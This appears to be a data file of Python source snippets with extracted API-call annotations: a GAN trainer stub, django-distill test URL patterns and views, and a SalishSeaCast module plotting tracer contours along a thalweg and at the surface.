        # TODO: add the loss you want to log here
        self.metric_names = ['disc', 'gen']
        self.train_metrics = MetricTracker(*[metric for metric in self.metric_names], writer=self.writer)
        self.valid_metrics = MetricTracker(*[metric for metric in self.metric_names], writer=self.writer)

    def _train_epoch(self, epoch):
        """
        Training logic for an epoch

        :param epoch: Integer, current training epoch.
        :return: A log that contains average loss and metric in this epoch.
        """
        self.gen.train()
        self.disc.train()
        self.train_metrics.reset()

        for batch_idx, (src_imgs, tar_imgs) in enumerate(self.train_dataloader):
            src_imgs, tar_imgs = src_imgs.to(self.device), tar_imgs.to(self.device)

            self.gen_optim.zero_grad()
            self.disc_optim.zero_grad()

            # Stub: everything below this raise is scaffold for the
            # implementer (disc_loss/gen_loss are not defined yet).
            raise NotImplementedError

            # ============ Generation ============ #

            # ============ train D ============ #

            # ============ train G ============ #

            # ============ log ============ #
            self.writer.set_step((epoch - 1) * len(self.train_dataloader) + batch_idx)
            # TODO: add the loss you want to log here

            if batch_idx % self.log_step == 0:
                self.logger.info('Train Epoch: {:d} {:d} Disc. Loss: {:.4f} Gen. Loss {:.4f}'.format(
                    epoch,
                    self._progress(batch_idx),
                    disc_loss.item(),
                    gen_loss.item()))

        log = self.train_metrics.result()

        val_log = self._valid_epoch(epoch)
        log.update(**{'val_'+k : v for k, v in val_log.items()})

        # shuffle data loader
        self.train_dataloader.shuffle()
        return log

    def _valid_epoch(self, epoch):
        """
        Validate after training an epoch

        :param epoch: Integer, current training epoch.
        :return: A log that contains information about validation
        """
        self.gen.eval()
        self.disc.eval()

        disc_losses = []
        gen_losses = []

        self.valid_metrics.reset()
        with torch.no_grad():
            for batch_idx, (src_imgs, tar_imgs) in enumerate(self.valid_dataloader):
                src_imgs, tar_imgs = src_imgs.to(self.device), tar_imgs.to(self.device)
                # TODO similar to train but not optimizer.step()
                # Stub: scaffold below (fake_tar_imgs is not defined yet).
                raise NotImplementedError

                # ============ Generation ============ #

                # ============ D Loss ============ #

                # ============ G Loss ============ #

            # log losses
            self.writer.set_step(epoch)
            self.valid_metrics.update('disc', np.mean(disc_losses))
            self.valid_metrics.update('gen', np.mean(gen_losses))

            # log images
            src_tar_imgs = torch.cat([src_imgs.cpu(), fake_tar_imgs.cpu()], dim=-1)
            self.writer.add_image('src2tar', make_grid(src_tar_imgs.cpu(), nrow=1, normalize=True))

        return self.valid_metrics.result()

    def _save_checkpoint(self, epoch):
        """
        Saving checkpoints

        :param epoch: current epoch number
        :param log: logging information of the epoch
        :param save_best: if True, rename the saved checkpoint to 'model_best.pth'
        """
        # Unwrap DataParallel (.module) so checkpoints load on any device count.
        state = {
            'epoch': epoch,
            'gen_state_dict': self.gen.state_dict() if len(self.device_ids) <= 1 else self.gen.module.state_dict(),
            'disc_state_dict': self.disc.state_dict() if len(self.device_ids) <= 1 else self.disc.module.state_dict(),
            'gen_optim': self.gen_optim.state_dict(),
            'disc_optim': self.disc_optim.state_dict()
        }
        # Always overwrite "current.pth"; keep a periodic epoch snapshot too.
        filename = str(self.config.checkpoint_dir + 'current.pth')
        torch.save(state, filename)
        self.logger.info("Saving checkpoint: {} ...".format(filename))
        if epoch % self.save_period == 0:
            filename = str(self.config.checkpoint_dir + 'epoch{}.pth'.format(epoch))
            torch.save(state, filename)
            self.logger.info("Saving checkpoint: {} ...".format(filename))

    def _resume_checkpoint(self, resume_path):
        """
        Resume from saved checkpoints

        :param resume_path: Checkpoint path to be resumed
        """
        resume_path = str(resume_path)
        self.logger.info("Loading checkpoint: {} ...".format(resume_path))
        checkpoint = torch.load(resume_path)
        self.start_epoch = checkpoint['epoch'] + 1

        # load architecture params from checkpoint.
        self.gen.load_state_dict(checkpoint['gen_state_dict'])
        self.disc.load_state_dict(checkpoint['disc_state_dict'])

        # load optimizer state from checkpoint only when optimizer type is not changed.
        self.gen_optim.load_state_dict(checkpoint['gen_optim'])
        self.disc_optim.load_state_dict(checkpoint['disc_optim'])

        self.logger.info("Checkpoint loaded. Resume training from epoch {}".format(self.start_epoch))
| [
"numpy.mean",
"numpy.sqrt",
"models.Generator",
"torch.load",
"data_loaders.CartoonDataLoader",
"torch.nn.DataParallel",
"models.Discriminator",
"utils.MetricTracker",
"torch.save",
"torch.no_grad"
] | [((1475, 1689), 'data_loaders.CartoonDataLoader', 'CartoonDataLoader', ([], {'data_dir': 'self.config.data_dir', 'src_style': '"""real"""', 'tar_style': 'self.config.tar_style', 'batch_size': 'self.config.batch_size', 'image_size': 'self.config.image_size', 'num_workers': 'self.config.num_workers'}), "(data_dir=self.config.data_dir, src_style='real',\n tar_style=self.config.tar_style, batch_size=self.config.batch_size,\n image_size=self.config.image_size, num_workers=self.config.num_workers)\n", (1492, 1689), False, 'from data_loaders import CartoonDataLoader\n'), ((1967, 2072), 'models.Generator', 'Generator', (['self.config.image_size', 'self.config.down_size', 'self.config.num_res', 'self.config.skip_conn'], {}), '(self.config.image_size, self.config.down_size, self.config.\n num_res, self.config.skip_conn)\n', (1976, 2072), False, 'from models import Generator, Discriminator\n'), ((2083, 2143), 'models.Discriminator', 'Discriminator', (['self.config.image_size', 'self.config.down_size'], {}), '(self.config.image_size, self.config.down_size)\n', (2096, 2143), False, 'from models import Generator, Discriminator\n'), ((2999, 3075), 'utils.MetricTracker', 'MetricTracker', (['*[metric for metric in self.metric_names]'], {'writer': 'self.writer'}), '(*[metric for metric in self.metric_names], writer=self.writer)\n', (3012, 3075), False, 'from utils import MetricTracker\n'), ((3105, 3181), 'utils.MetricTracker', 'MetricTracker', (['*[metric for metric in self.metric_names]'], {'writer': 'self.writer'}), '(*[metric for metric in self.metric_names], writer=self.writer)\n', (3118, 3181), False, 'from utils import MetricTracker\n'), ((6700, 6727), 'torch.save', 'torch.save', (['state', 'filename'], {}), '(state, filename)\n', (6710, 6727), False, 'import torch\n'), ((7346, 7369), 'torch.load', 'torch.load', (['resume_path'], {}), '(resume_path)\n', (7356, 7369), False, 'import torch\n'), ((525, 566), 'numpy.sqrt', 'np.sqrt', (['self.train_dataloader.batch_size'], {}), 
'(self.train_dataloader.batch_size)\n', (532, 566), True, 'import numpy as np\n'), ((944, 1003), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['self.gen'], {'device_ids': 'self.device_ids'}), '(self.gen, device_ids=self.device_ids)\n', (965, 1003), False, 'import torch\n'), ((1028, 1088), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['self.disc'], {'device_ids': 'self.device_ids'}), '(self.disc, device_ids=self.device_ids)\n', (1049, 1088), False, 'import torch\n'), ((5035, 5050), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5048, 5050), False, 'import torch\n'), ((6939, 6966), 'torch.save', 'torch.save', (['state', 'filename'], {}), '(state, filename)\n', (6949, 6966), False, 'import torch\n'), ((5612, 5632), 'numpy.mean', 'np.mean', (['disc_losses'], {}), '(disc_losses)\n', (5619, 5632), True, 'import numpy as np\n'), ((5679, 5698), 'numpy.mean', 'np.mean', (['gen_losses'], {}), '(gen_losses)\n', (5686, 5698), True, 'import numpy as np\n')] |
from django.conf import settings
from django.http import HttpResponse
from django.urls import include, path
from django.contrib.flatpages.views import flatpage as flatpage_view
from django.apps import apps as django_apps
from django_distill import distill_url, distill_path, distill_re_path
def test_no_param_view(request):
    """View with no URL parameters; always returns the literal body ``test``."""
    body = b'test'
    return HttpResponse(body, content_type='application/octet-stream')
def test_positional_param_view(request, param):
    """View echoing a positional URL parameter after the ``test`` prefix."""
    body = b'test' + param.encode()
    return HttpResponse(body, content_type='application/octet-stream')
def test_named_param_view(request, param=None):
    """View echoing the named URL parameter after the ``test`` prefix."""
    payload = b'test' + param.encode()
    return HttpResponse(payload, content_type='application/octet-stream')
def test_session_view(request):
    """View that writes to the session, making the response session-dependent."""
    session_key = 'test'
    request.session[session_key] = 'test'
    return HttpResponse(b'test', content_type='application/octet-stream')
def test_broken_view(request):
# Trigger a normal Python exception when rendering
a = 1 / 0
def test_http404_view(request):
    """View returning HTTP 404 with the literal body ``404``."""
    resp = HttpResponse(b'404', content_type='application/octet-stream')
    resp.status_code = 404
    return resp
def test_no_param_func():
    # Distill func for a parameter-less URL: None means "no argument sets".
    return None
def test_positional_param_func():
    """Return the positional-argument set to distill the URL with."""
    args = ('12345',)
    return args
def test_named_param_func():
    """Return the list of keyword-argument sets to distill the URL with."""
    return [dict(param='test')]
def test_flatpages_func():
    """Yield URL kwargs for every public flatpage on the current site."""
    Site = django_apps.get_model('sites.Site')
    site = Site.objects.get_current()
    public_pages = site.flatpage_set.filter(registration_required=False)
    for page in public_pages:
        yield {'url': page.url}
# URL patterns under test, covering the three django-distill registration
# APIs: distill_url() (regex), distill_re_path(), and distill_path().
urlpatterns = [
    distill_url(r'^url/$',
                test_no_param_view,
                name='url-no-param',
                distill_func=test_no_param_func,
                distill_file='test'),
    distill_url(r'^url-no-func/$',
                test_no_param_view,
                name='url-no-param-no-func',
                distill_file='test'),
    distill_url(r'^url/([\d]+)$',
                test_positional_param_view,
                name='url-positional-param',
                distill_func=test_positional_param_func),
    distill_url(r'^url/(?P<param>[\w]+)$',
                test_named_param_view,
                name='url-named-param',
                distill_func=test_named_param_func),
    # Included URL confs, with and without a namespace.
    path('path/namespace1/',
         include('tests.namespaced_urls', namespace='test_namespace')),
    path('path/no-namespace/',
         include('tests.no_namespaced_urls')),
]
# re_path()-style patterns only on Django versions that provide re_path.
if settings.HAS_RE_PATH:
    urlpatterns += [
        distill_re_path(r'^re_path/$',
                        test_no_param_view,
                        name='re_path-no-param',
                        distill_func=test_no_param_func,
                        distill_file='test'),
        distill_re_path(r'^re_path-no-func/$',
                        test_no_param_view,
                        name='re_path-no-param-no-func',
                        distill_file='test'),
        distill_re_path(r'^re_path/([\d]+)$',
                        test_positional_param_view,
                        name='re_path-positional-param',
                        distill_func=test_positional_param_func),
        distill_re_path(r'^re_path/(?P<param>[\w]+)$',
                        test_named_param_view,
                        name='re_path-named-param',
                        distill_func=test_named_param_func),
        distill_re_path(r'^re_path/broken$',
                        test_broken_view,
                        name='re_path-broken',
                        distill_func=test_no_param_func),
        distill_re_path(r'^re_path/ignore-sessions$',
                        test_session_view,
                        name='re_path-ignore-sessions',
                        distill_func=test_no_param_func),
        distill_re_path(r'^re_path/404$',
                        test_http404_view,
                        name='re_path-404',
                        distill_status_codes=(404,),
                        distill_func=test_no_param_func),
        distill_re_path(r'^re_path/flatpage(?P<url>.+)$',
                        flatpage_view,
                        name='re_path-flatpage',
                        distill_func=test_flatpages_func),
    ]
# path()-style patterns only on Django versions that provide path().
if settings.HAS_PATH:
    urlpatterns += [
        distill_path('path/',
                     test_no_param_view,
                     name='path-no-param',
                     distill_func=test_no_param_func,
                     distill_file='test'),
        distill_path('path-no-func/',
                     test_no_param_view,
                     name='path-no-param-no-func',
                     distill_file='test'),
        distill_path('path/<int>',
                     test_positional_param_view,
                     name='path-positional-param',
                     distill_func=test_positional_param_func),
        distill_path('path/<str:param>',
                     test_named_param_view,
                     name='path-named-param',
                     distill_func=test_named_param_func),
        distill_path('path/broken',
                     test_broken_view,
                     name='path-broken',
                     distill_func=test_no_param_func),
        distill_path('path/ignore-sessions',
                     test_session_view,
                     name='path-ignore-sessions',
                     distill_func=test_no_param_func),
        distill_path('path/404',
                     test_http404_view,
                     name='path-404',
                     distill_status_codes=(404,),
                     distill_func=test_no_param_func),
        distill_path('path/flatpage<path:url>',
                     flatpage_view,
                     name='path-flatpage',
                     distill_func=test_flatpages_func),
    ]
| [
"django_distill.distill_re_path",
"django.urls.include",
"django.http.HttpResponse",
"django_distill.distill_url",
"django_distill.distill_path",
"django.apps.apps.get_model"
] | [((337, 399), 'django.http.HttpResponse', 'HttpResponse', (["b'test'"], {'content_type': '"""application/octet-stream"""'}), "(b'test', content_type='application/octet-stream')\n", (349, 399), False, 'from django.http import HttpResponse\n'), ((812, 874), 'django.http.HttpResponse', 'HttpResponse', (["b'test'"], {'content_type': '"""application/octet-stream"""'}), "(b'test', content_type='application/octet-stream')\n", (824, 874), False, 'from django.http import HttpResponse\n'), ((1026, 1087), 'django.http.HttpResponse', 'HttpResponse', (["b'404'"], {'content_type': '"""application/octet-stream"""'}), "(b'404', content_type='application/octet-stream')\n", (1038, 1087), False, 'from django.http import HttpResponse\n'), ((1343, 1378), 'django.apps.apps.get_model', 'django_apps.get_model', (['"""sites.Site"""'], {}), "('sites.Site')\n", (1364, 1378), True, 'from django.apps import apps as django_apps\n'), ((1593, 1714), 'django_distill.distill_url', 'distill_url', (['"""^url/$"""', 'test_no_param_view'], {'name': '"""url-no-param"""', 'distill_func': 'test_no_param_func', 'distill_file': '"""test"""'}), "('^url/$', test_no_param_view, name='url-no-param', distill_func\n =test_no_param_func, distill_file='test')\n", (1604, 1714), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((1748, 1852), 'django_distill.distill_url', 'distill_url', (['"""^url-no-func/$"""', 'test_no_param_view'], {'name': '"""url-no-param-no-func"""', 'distill_file': '"""test"""'}), "('^url-no-func/$', test_no_param_view, name=\n 'url-no-param-no-func', distill_file='test')\n", (1759, 1852), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((1878, 2010), 'django_distill.distill_url', 'distill_url', (['"""^url/([\\\\d]+)$"""', 'test_positional_param_view'], {'name': '"""url-positional-param"""', 'distill_func': 'test_positional_param_func'}), "('^url/([\\\\d]+)$', test_positional_param_view, name=\n 'url-positional-param', 
distill_func=test_positional_param_func)\n", (1889, 2010), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((2035, 2161), 'django_distill.distill_url', 'distill_url', (['"""^url/(?P<param>[\\\\w]+)$"""', 'test_named_param_view'], {'name': '"""url-named-param"""', 'distill_func': 'test_named_param_func'}), "('^url/(?P<param>[\\\\w]+)$', test_named_param_view, name=\n 'url-named-param', distill_func=test_named_param_func)\n", (2046, 2161), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((2219, 2279), 'django.urls.include', 'include', (['"""tests.namespaced_urls"""'], {'namespace': '"""test_namespace"""'}), "('tests.namespaced_urls', namespace='test_namespace')\n", (2226, 2279), False, 'from django.urls import include, path\n'), ((2321, 2356), 'django.urls.include', 'include', (['"""tests.no_namespaced_urls"""'], {}), "('tests.no_namespaced_urls')\n", (2328, 2356), False, 'from django.urls import include, path\n'), ((2419, 2551), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/$"""', 'test_no_param_view'], {'name': '"""re_path-no-param"""', 'distill_func': 'test_no_param_func', 'distill_file': '"""test"""'}), "('^re_path/$', test_no_param_view, name='re_path-no-param',\n distill_func=test_no_param_func, distill_file='test')\n", (2434, 2551), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((2606, 2722), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path-no-func/$"""', 'test_no_param_view'], {'name': '"""re_path-no-param-no-func"""', 'distill_file': '"""test"""'}), "('^re_path-no-func/$', test_no_param_view, name=\n 're_path-no-param-no-func', distill_file='test')\n", (2621, 2722), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((2764, 2908), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/([\\\\d]+)$"""', 'test_positional_param_view'], {'name': 
'"""re_path-positional-param"""', 'distill_func': 'test_positional_param_func'}), "('^re_path/([\\\\d]+)$', test_positional_param_view, name=\n 're_path-positional-param', distill_func=test_positional_param_func)\n", (2779, 2908), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((2949, 3087), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/(?P<param>[\\\\w]+)$"""', 'test_named_param_view'], {'name': '"""re_path-named-param"""', 'distill_func': 'test_named_param_func'}), "('^re_path/(?P<param>[\\\\w]+)$', test_named_param_view, name=\n 're_path-named-param', distill_func=test_named_param_func)\n", (2964, 3087), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((3128, 3241), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/broken$"""', 'test_broken_view'], {'name': '"""re_path-broken"""', 'distill_func': 'test_no_param_func'}), "('^re_path/broken$', test_broken_view, name='re_path-broken',\n distill_func=test_no_param_func)\n", (3143, 3241), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((3284, 3417), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/ignore-sessions$"""', 'test_session_view'], {'name': '"""re_path-ignore-sessions"""', 'distill_func': 'test_no_param_func'}), "('^re_path/ignore-sessions$', test_session_view, name=\n 're_path-ignore-sessions', distill_func=test_no_param_func)\n", (3299, 3417), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((3459, 3596), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/404$"""', 'test_http404_view'], {'name': '"""re_path-404"""', 'distill_status_codes': '(404,)', 'distill_func': 'test_no_param_func'}), "('^re_path/404$', test_http404_view, name='re_path-404',\n distill_status_codes=(404,), distill_func=test_no_param_func)\n", (3474, 3596), False, 'from django_distill import distill_url, distill_path, 
distill_re_path\n'), ((3651, 3778), 'django_distill.distill_re_path', 'distill_re_path', (['"""^re_path/flatpage(?P<url>.+)$"""', 'flatpage_view'], {'name': '"""re_path-flatpage"""', 'distill_func': 'test_flatpages_func'}), "('^re_path/flatpage(?P<url>.+)$', flatpage_view, name=\n 're_path-flatpage', distill_func=test_flatpages_func)\n", (3666, 3778), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((3873, 3994), 'django_distill.distill_path', 'distill_path', (['"""path/"""', 'test_no_param_view'], {'name': '"""path-no-param"""', 'distill_func': 'test_no_param_func', 'distill_file': '"""test"""'}), "('path/', test_no_param_view, name='path-no-param',\n distill_func=test_no_param_func, distill_file='test')\n", (3885, 3994), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4048, 4153), 'django_distill.distill_path', 'distill_path', (['"""path-no-func/"""', 'test_no_param_view'], {'name': '"""path-no-param-no-func"""', 'distill_file': '"""test"""'}), "('path-no-func/', test_no_param_view, name=\n 'path-no-param-no-func', distill_file='test')\n", (4060, 4153), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4194, 4324), 'django_distill.distill_path', 'distill_path', (['"""path/<int>"""', 'test_positional_param_view'], {'name': '"""path-positional-param"""', 'distill_func': 'test_positional_param_func'}), "('path/<int>', test_positional_param_view, name=\n 'path-positional-param', distill_func=test_positional_param_func)\n", (4206, 4324), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4365, 4486), 'django_distill.distill_path', 'distill_path', (['"""path/<str:param>"""', 'test_named_param_view'], {'name': '"""path-named-param"""', 'distill_func': 'test_named_param_func'}), "('path/<str:param>', test_named_param_view, name=\n 'path-named-param', distill_func=test_named_param_func)\n", (4377, 4486), False, 'from django_distill 
import distill_url, distill_path, distill_re_path\n'), ((4527, 4629), 'django_distill.distill_path', 'distill_path', (['"""path/broken"""', 'test_broken_view'], {'name': '"""path-broken"""', 'distill_func': 'test_no_param_func'}), "('path/broken', test_broken_view, name='path-broken',\n distill_func=test_no_param_func)\n", (4539, 4629), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4671, 4793), 'django_distill.distill_path', 'distill_path', (['"""path/ignore-sessions"""', 'test_session_view'], {'name': '"""path-ignore-sessions"""', 'distill_func': 'test_no_param_func'}), "('path/ignore-sessions', test_session_view, name=\n 'path-ignore-sessions', distill_func=test_no_param_func)\n", (4683, 4793), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((4834, 4960), 'django_distill.distill_path', 'distill_path', (['"""path/404"""', 'test_http404_view'], {'name': '"""path-404"""', 'distill_status_codes': '(404,)', 'distill_func': 'test_no_param_func'}), "('path/404', test_http404_view, name='path-404',\n distill_status_codes=(404,), distill_func=test_no_param_func)\n", (4846, 4960), False, 'from django_distill import distill_url, distill_path, distill_re_path\n'), ((5014, 5128), 'django_distill.distill_path', 'distill_path', (['"""path/flatpage<path:url>"""', 'flatpage_view'], {'name': '"""path-flatpage"""', 'distill_func': 'test_flatpages_func'}), "('path/flatpage<path:url>', flatpage_view, name='path-flatpage',\n distill_func=test_flatpages_func)\n", (5026, 5128), False, 'from django_distill import distill_url, distill_path, distill_re_path\n')] |
# Copyright 2013-2021 The Salish Sea MEOPAR contributors
# and The University of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Produce a figure that shows colour contours of a tracer on a vertical slice
along a section of the domain thalweg,
and on the surface for a section of the domain that excludes Puget Sound
in the south and Johnstone Strait in the north.
Testing notebook for this module is
https://nbviewer.jupyter.org/github/SalishSeaCast/SalishSeaNowcast/blob/main/notebooks/figures/research/TestTracerThalwegAndSurfaceHourly.ipynb
"""
from types import SimpleNamespace
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import gridspec
from salishsea_tools import visualisations as vis
from salishsea_tools import viz_tools
import nowcast.figures.website_theme
def make_figure(
    hr,
    tracer_var,
    bathy,
    mesh_mask,
    clevels_thalweg,
    clevels_surface,
    cmap,
    depth_integrated,
    figsize=(16, 9),
    theme=nowcast.figures.website_theme,
):
    """Plot colour contours of tracer on a vertical slice along a section of
    the domain thalweg,
    and on the surface for the Strait of Georgia and Juan de Fuca Strait
    regions of the domain.
    :param hr: UTC time in hours
    :type hr: :class: str
    :param tracer_var: Hourly average tracer results from NEMO run.
    :type tracer_var: :py:class:`netCDF4.Variable`
    :param bathy: Salish Sea NEMO model bathymetry data.
    :type bathy: :class:`netCDF4.Dataset`
    :param mesh_mask: NEMO-generated mesh mask for run that produced tracer_var.
    :type mesh_mask: :class:`netCDF4.Dataset`
    :param clevels_thalweg: Colour bar contour intervals for thalweg plot.
    :type clevels_thalweg: :class:`numpy.ndarray`
    :param clevels_surface: Colour bar contour intervals for surface plot.
    :type clevels_surface: :class:`numpy.ndarray`
    :param cmap: Colour map to use for tracer_var contour plots.
    :type cmap: :py:class:`matplotlib.colors.LinearSegmentedColormap`
    :param boolean depth_integrated: Integrate the tracer over the water column
                                     depth when :py:obj:`True`.
    :param 2-tuple figsize: Figure size (width, height) in inches.
    :param theme: Module-like object that defines the style elements for the
                  figure. See :py:mod:`nowcast.figures.website_theme` for an
                  example.
    :returns: :py:class:`matplotlib.figure.Figure`
    """
    # Extract the hour's field and the surface sub-domain once, then feed
    # the same prepared data to both panels.
    plot_data = _prep_plot_data(hr, tracer_var, mesh_mask, depth_integrated)
    fig, (ax_thalweg, ax_surface) = _prep_fig_axes(figsize, theme)
    cbar_thalweg = _plot_tracer_thalweg(
        ax_thalweg, plot_data, bathy, mesh_mask, cmap, clevels_thalweg
    )
    _thalweg_axes_labels(ax_thalweg, plot_data, clevels_thalweg, cbar_thalweg, theme)
    cbar_surface = _plot_tracer_surface(ax_surface, plot_data, cmap, clevels_surface)
    _surface_axes_labels(
        ax_surface, tracer_var, depth_integrated, clevels_surface, cbar_surface, theme
    )
    return fig
def clevels(tracer_var, mesh_mask, depth_integrated):
    """Calculate the colour bar contour intervals for the thalweg and surface
    plot axes based on the tracer variable values at hr=0.
    :param tracer_var: Hourly average tracer results from NEMO run.
    :type tracer_var: :py:class:`netCDF4.Variable`
    :param mesh_mask: NEMO-generated mesh mask for run that produced tracer_var.
    :type mesh_mask: :class:`netCDF4.Dataset`
    :param boolean depth_integrated: Integrate the tracer over the water column
                                     depth when :py:obj:`True`.
    :returns: Colour bar contour intervals for thalweg and surface plot axes.
    :rtype: 2-tuple of :class:`numpy.ndarray` objects
    """
    # Contour intervals are derived from the hour-zero field only.
    hour_zero_data = _prep_plot_data(0, tracer_var, mesh_mask, depth_integrated)
    return _calc_clevels(hour_zero_data)
def _prep_plot_data(hr, tracer_var, mesh_mask, depth_integrated):
sj, ej = 200, 800
si, ei = 20, 395
tracer_hr = tracer_var[hr]
masked_tracer_hr = np.ma.masked_where(mesh_mask["tmask"][0, ...] == 0, tracer_hr)
surface_hr = masked_tracer_hr[0, sj:ej, si:ei]
if depth_integrated:
grid_heights = mesh_mask.variables["e3t_1d"][:][0].reshape(
tracer_hr.shape[0], 1, 1
)
height_weighted = masked_tracer_hr[:, sj:ej, si:ei] * grid_heights
surface_hr = height_weighted.sum(axis=0)
return SimpleNamespace(
tracer_var=tracer_var,
tracer_hr=tracer_hr,
surface_hr=surface_hr,
surface_j_limits=(sj, ej),
surface_i_limits=(si, ei),
thalweg_depth_limits=(0, 450),
thalweg_length_limits=(0, 632),
)
def _prep_fig_axes(figsize, theme):
fig = plt.figure(figsize=figsize, facecolor=theme.COLOURS["figure"]["facecolor"])
gs = gridspec.GridSpec(1, 2, width_ratios=[1.4, 1])
ax_thalweg = fig.add_subplot(gs[0])
ax_thalweg.set_facecolor(theme.COLOURS["axes"]["background"])
ax_surface = fig.add_subplot(gs[1])
ax_surface.set_facecolor(theme.COLOURS["axes"]["background"])
return fig, (ax_thalweg, ax_surface)
def _calc_clevels(plot_data):
"""Calculate contour levels for the thalweg and surface plot axes."""
percent_98_thalweg = np.percentile(
np.ma.masked_values(plot_data.tracer_hr, 0).compressed(), 98
)
percent_2_thalweg = np.percentile(
np.ma.masked_values(plot_data.tracer_hr, 0).compressed(), 2
)
percent_98_surf = np.percentile(plot_data.surface_hr.compressed(), 98)
percent_2_surf = np.percentile(plot_data.surface_hr.compressed(), 2)
clevels_thalweg = np.arange(
percent_2_thalweg,
percent_98_thalweg,
(percent_98_thalweg - percent_2_thalweg) / 20.0,
)
clevels_surface = np.arange(
percent_2_surf, percent_98_surf, (percent_98_surf - percent_2_surf) / 20.0
)
return clevels_thalweg, clevels_surface
def _plot_tracer_thalweg(ax, plot_data, bathy, mesh_mask, cmap, clevels):
    """Draw filled contours of the tracer along the thalweg section and
    return the colour bar that was created for them.
    """
    cbar = vis.contour_thalweg(
        ax,
        plot_data.tracer_hr,
        bathy,
        mesh_mask,
        clevels=clevels,
        cmap=cmap,
        ## TODO: Can this path be moved into nowcast.yaml config file?
        thalweg_file="/SalishSeaCast/tools/bathymetry/thalweg_working" ".txt",
        cbar_args={"fraction": 0.030, "pad": 0.04, "aspect": 45},
    )
    return cbar
def _thalweg_axes_labels(ax, plot_data, clevels, cbar, theme):
    """Set the thalweg panel's extents, axis labels, and colour bar labels."""
    ax.set_xlim(plot_data.thalweg_length_limits)
    # Depth axis is inverted so the surface sits at the top of the panel.
    depth_min, depth_max = plot_data.thalweg_depth_limits
    ax.set_ylim(depth_max, depth_min)
    tracer = plot_data.tracer_var
    _cbar_labels(cbar, clevels[::2], theme, f"{tracer.long_name} [{tracer.units}]")
    axis_style = dict(
        color=theme.COLOURS["text"]["axis"],
        fontproperties=theme.FONTS["axis"],
    )
    ax.set_xlabel("Distance along thalweg [km]", **axis_style)
    ax.set_ylabel("Depth [m]", **axis_style)
    theme.set_axis_colors(ax)
def _cbar_labels(cbar, contour_intervals, theme, label):
cbar.set_ticks(contour_intervals)
cbar.ax.axes.tick_params(labelcolor=theme.COLOURS["cbar"]["tick labels"])
cbar.set_label(
label, fontproperties=theme.FONTS["axis"], color=theme.COLOURS["text"]["axis"]
)
def _plot_tracer_surface(ax, plot_data, cmap, clevels):
x, y = np.meshgrid(
np.arange(*plot_data.surface_i_limits, dtype=int),
np.arange(*plot_data.surface_j_limits, dtype=int),
)
mesh = ax.contourf(
x, y, plot_data.surface_hr, levels=clevels, cmap=cmap, extend="both"
)
cbar = plt.colorbar(mesh, ax=ax, fraction=0.034, pad=0.04, aspect=45)
return cbar
def _surface_axes_labels(ax, tracer_var, depth_integrated, clevels, cbar, theme):
    """Set the surface panel's axis labels, colour bar label, aspect ratio,
    and land colour.
    """
    # Depth-integrated fields carry units of tracer-units times metres.
    units = f"{tracer_var.units}*m" if depth_integrated else f"{tracer_var.units}"
    _cbar_labels(cbar, clevels[::2], theme, f"{tracer_var.long_name} [{units}]")
    axis_style = dict(
        color=theme.COLOURS["text"]["axis"],
        fontproperties=theme.FONTS["axis"],
    )
    ax.set_xlabel("Grid x", **axis_style)
    ax.set_ylabel("Grid y", **axis_style)
    # Land shows through where the contour field is masked.
    ax.set_facecolor("burlywood")
    viz_tools.set_aspect(ax)
    theme.set_axis_colors(ax)
| [
"numpy.ma.masked_values",
"types.SimpleNamespace",
"matplotlib.pyplot.colorbar",
"numpy.ma.masked_where",
"matplotlib.pyplot.figure",
"matplotlib.gridspec.GridSpec",
"salishsea_tools.visualisations.contour_thalweg",
"salishsea_tools.viz_tools.set_aspect",
"numpy.arange"
